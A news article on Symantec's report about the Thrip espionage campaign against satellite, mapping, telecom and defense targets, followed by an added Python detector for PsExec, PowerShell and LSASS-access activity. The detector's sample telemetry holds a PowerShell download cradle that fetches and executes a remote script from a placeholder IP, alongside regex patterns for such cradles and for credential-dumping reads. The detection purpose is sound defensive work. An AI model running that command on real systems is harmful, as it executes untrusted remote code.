Chinese group behind cyber-espionage campaign against U.S. companies, report says


A “wide” cyber-espionage campaign has been launched by a China-based group known as Thrip, according to a threat intelligence report released by cybersecurity giant Symantec.

The attacks were first detected early this year, and a Symantec spokesman told Fox News that the company has confirmed activity up to and including May.

Symantec traced the attacks to three computers located in China that were used to launch them. “Thrip’s motive is probably espionage, and its targets are in the communications, spatial imaging, and defense sectors, both in the United States and Southeast Asia,” the report said.

(Thrip attack group: spying on communications, mapping, and defense targets. Credit: Symantec)


Symantec declined to identify the companies.

Satellite operator targeted

One of the most disturbing attacks was aimed at a satellite operator, Symantec said.

“The attack group seemed especially interested in the operational side of the business, seeking out and infecting computers running software that monitors satellites,” Symantec said. “This suggests that Thrip’s motives go beyond spying and may also include disruption.”

Another target was an organization involved in geospatial imaging and mapping. In this case, Thrip targeted computers running MapXtreme GIS (Geographic Information System) software, as well as machines running Google Earth Server and Garmin imaging software.

Other targets included three different telecom operators, all located in Southeast Asia.

“In all cases…it turned out that the telecom companies themselves and not their customers were the target of these attacks,” Symantec added.

A defense contractor was also targeted. Asked by Fox News, Symantec would not elaborate on the nature of the threat or the contractor’s identity.


Since 2013

Symantec first discovered the China-based Thrip espionage group in 2013. Since then, the group has changed tactics, Symantec said. Thrip has switched from relying on custom malware alone to a mixture of custom malware and so-called “living off the land” tools, which Symantec describes as the use of legitimate operating system features and network administration tools to compromise victims’ networks. Because such activity looks like routine administration, it helps mask the attacker’s presence.

One such tool is PsExec, a Microsoft (Sysinternals) utility for running processes on remote Windows systems. The attackers used it to try to install their malware remotely. “When we analyzed the malware, we discovered that it was an updated version of Trojan.Rikamanu, malware associated with Thrip,” Symantec said.

Another legitimate program is PowerShell, Microsoft’s scripting tool, which “was used to execute commands to download payloads, traverse compromised networks, and carry out reconnaissance,” Symantec said.

Other freely available tools were also used, such as Mimikatz, which is frequently used for malicious purposes: to change privileges, export certificates, and recover Windows passwords.

To detect such attacks, Symantec has developed a technology called Targeted Attack Analytics, or TAA, which uses artificial intelligence and machine learning to spot attackers who are using seemingly innocent tools.

“It was TAA that led us to the latest cyber-espionage campaign that we have discovered,” Symantec said.
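The living-off-the-land tradecraft described above (PsExec pushing a service to a remote host, PowerShell pulling down a payload, Mimikatz reading LSASS memory) leaves ordinary-looking but correlatable traces in Windows telemetry. The following is an added example, not Symantec’s TAA or any code from the report: a small Python detector run over constructed event records modelled on Windows System log event 7045 (service installed) and Sysmon event IDs 1 (process create) and 10 (process access). The host names, IP address, file paths and the allowlist of processes that legitimately open LSASS are assumptions for the illustration; the single-host time-window correlation is a simplification of what a real analytics engine does.

```python
"""Flag PsExec, PowerShell download cradles and LSASS reads, then chain them per host."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from os.path import basename

# Constructed sample telemetry (not real logs). ws-12 is the compromised host;
# ws-40 shows benign admin activity that the rules must not flag.
SAMPLE_EVENTS = [
    {"ts": "2018-05-10T09:00:01", "host": "ws-12", "id": 7045,
     "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"ts": "2018-05-10T09:00:03", "host": "ws-12", "id": 1,
     "Image": r"C:\Windows\PSEXESVC.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\PSEXESVC.exe"},
    {"ts": "2018-05-10T09:00:05", "host": "ws-12", "id": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object "
                    "Net.WebClient).DownloadString('http://203.0.113.7/u.ps1')\""},
    {"ts": "2018-05-10T09:02:40", "host": "ws-12", "id": 10,
     "SourceImage": r"C:\Users\Public\mk.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"ts": "2018-05-10T11:15:00", "host": "ws-40", "id": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"ts": "2018-05-10T11:16:00", "host": "ws-40", "id": 10,
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
]

# Typical download-cradle and evasion fragments seen on PowerShell command lines.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b"
    r"|-[Ee]nc(odedCommand)?\b|-[Ww](indowStyle)?\s+[Hh]idden"
)
# Assumed allowlist of system processes that legitimately open LSASS; tune per estate.
LSASS_READERS_OK = {"csrss.exe", "wininit.exe", "lsm.exe", "msmpeng.exe"}
PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory


def bn(path):
    """Basename of a Windows path, lower-cased (works on non-Windows hosts too)."""
    return basename(path.replace("\\", "/")).lower()


def classify(ev):
    """Return a list of (rule, detail) pairs for every rule the event matches."""
    matches, eid = [], ev["id"]
    if eid == 7045 and "PSEXESVC" in (ev.get("ServiceName", "") + ev.get("ImagePath", "")).upper():
        matches.append(("psexec_service_install", ev.get("ImagePath", "")))
    if eid == 1 and bn(ev.get("Image", "")) == "powershell.exe":
        hits = sorted({m.group(0) for m in CRADLE_RE.finditer(ev.get("CommandLine", ""))})
        if hits:
            matches.append(("powershell_download_cradle", ", ".join(hits)))
    if eid == 1 and bn(ev.get("ParentImage", "")) == "psexesvc.exe":
        matches.append(("psexec_spawned_process", ev.get("Image", "")))
    if eid == 10 and bn(ev.get("TargetImage", "")) == "lsass.exe":
        src = bn(ev.get("SourceImage", ""))
        if src not in LSASS_READERS_OK and int(ev.get("GrantedAccess", "0"), 16) & PROCESS_VM_READ:
            matches.append(("lsass_memory_read", ev.get("SourceImage", "")))
    return matches


def analyze(events, window=timedelta(minutes=10)):
    """Run the rules, then chain a PsExec install with later hits on the same host."""
    findings = []
    for ev in events:
        for rule, detail in classify(ev):
            findings.append({"ts": datetime.fromisoformat(ev["ts"]), "host": ev["host"],
                             "rule": rule, "detail": detail})
    by_host = defaultdict(list)
    for f in findings:
        by_host[f["host"]].append(f)
    chains = []
    for host, fs in by_host.items():
        fs.sort(key=lambda f: f["ts"])  # stable: same-timestamp order is preserved
        for anchor in (f for f in fs if f["rule"] == "psexec_service_install"):
            follow = [f["rule"] for f in fs if anchor["ts"] < f["ts"] <= anchor["ts"] + window]
            if follow:
                chains.append({"host": host, "start": anchor["ts"].isoformat(), "rules": follow})
    return {"findings": findings, "chains": chains}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for f in result["findings"]:
        print(f"{f['ts'].isoformat()} {f['host']} {f['rule']}: {f['detail']}")
    for c in result["chains"]:
        print(f"CHAIN on {c['host']} from {c['start']}: {' -> '.join(c['rules'])}")
```

Each rule on its own is noisy in a real environment (administrators do use PsExec, and some scripts do download files), which is why the example only escalates when a PsExec service install is followed within minutes by other hits on the same host; the allowlist for LSASS readers and the cradle regex are the two places a practitioner would expect to tune.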
